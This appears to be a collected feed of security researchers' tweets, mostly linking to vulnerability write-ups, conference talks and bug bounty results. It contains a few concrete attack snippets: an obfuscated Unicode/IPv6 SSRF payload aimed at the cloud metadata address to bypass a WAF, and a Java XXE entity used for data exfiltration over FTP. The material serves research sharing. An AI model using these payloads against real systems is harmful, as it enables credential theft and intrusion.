Huy Ngoc

Missed my Black Hat talk? Read how I got access to 22 internal Microsoft services at consentandcompromise.com

If the target sets X-Frame-Options: DENY, you can’t iframe it to abuse session context. But @slonser_ points out a slick workaround: use the fetchLater() API to schedule deferred requests that execute even after the page is closed or navigated away from.

The article is out ! 🤟 Title: We hacked Google’s A.I Gemini and leaked its source code (at least some part) We worked on this with @Rhynorater and I'm so excited this is finally out ;) Link in the thread 🧵

If you're interested in the technical details, I wrote the blog post here: flatt.tech/research/posts… For the further details, please check out the announcement from the OpenWrt team: lists.openwrt.org/pipermail/open… (2/2)

My blog post about several findings in Dynamics 365 Business Central. I tried writing in a .NET primer style for code audit beginners. frycos.github.io/vulns4free/202…

📣#NahamCon2024 returns on Friday May 24 (workshops) and May 25 (main talks) - hosted by @Rhynorater and @0xteknogeek from @ctbbpodcast! 🗓️ Schedule 👉🏼 nahamcon.com

The first batch of #H165 winners are here! On behalf of the HackerOne and @salesforce teams, thank you for your hard work. 💪 1st Place: arneswinner 3rd Place: ngocdh Eliminator: matanber Exterminators: shubs, ziot, nahamsec, ryotak Most Valuable Hacker: arneswinner

I can't believe so many people are sleeping on this research: code-white.com/blog/leaking-o… Code White again smashes it out of the park with their meticulous knowledge of software stacks. I have so much respect for them publishing this. Nice work, @mwulftange!

Check out our new blog post! We hacked into Apple Travel Portal (yes, again!) using a 0-day Remote Code Execution exploit. Part 1 is live now, stay tuned for the follow-up on another RCE worth a total bounty of $40k! blog.projectdiscovery.io/hello-lucee-le…

Some really cool AWS enumeration research was released today by @dagrz that's worth reading and understanding: blog.plerion.com/conditional-lo…

Early this morning, we alerted our customers to a new Ivanti SSRF vulnerability that our research team discovered when reverse engineering Ivanti’s latest patch. We decided to hold off on releasing this blog post publicly and support our customers in their remediation. Since this finding has been publicly posted by another party, we are also releasing our research to help add some more color. assetnote.io/resources/rese…

🎥 Recordings of #HEXACON2023 talks are now available on our YouTube channel: youtube.com/channel/UCtzuV…

Exploiting ASP .NET TemplateParser to get RCE in Sitecore (CVE-2023-35813) and SharePoint (CVE-2023-33160) by @mwulftange in two parts: part 1 at code-white.com/blog/exploitin… is live now and part 2 will follow in a few days...stay tuned!

this is a great write up! patrowl.io/blog-wordpress…

I've made $500k+ from SSRF vulnerabilities. Here are my tricks:

Successfully bypassed a SSRF WAF by using a combination of IPV6 + Unicode. Payload for Metadata instances: http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80 Check images for response difference between 169.254.169.254 and the above payload I shared 🔥 #bugbounty #infosec #waf

The impact achieved here is neat: labs.hakaioffsec.com/nginx-alias-tr… - I remember first reading about this from @fransrosen - blog.detectify.com/2020/11/10/com…

How I patch diffed CVE-2023-28121 to compromise a WooCommerce. rcesecurity.com/2023/07/patch-… #BugBounty #security

RE Tip. If you want to decrypt obfuscated .NET strings, just call them from Powershell. E.g. this is xWorm config decryption. File: virustotal.com/gui/file/cb0a5…

4/ 🔥 Did you know `<!ENTITY x SYSTEM "//domain/">` in Java triggers a FTP request, not HTTP ? The WAF didn't. I leveraged this oversight for successful data exfiltration.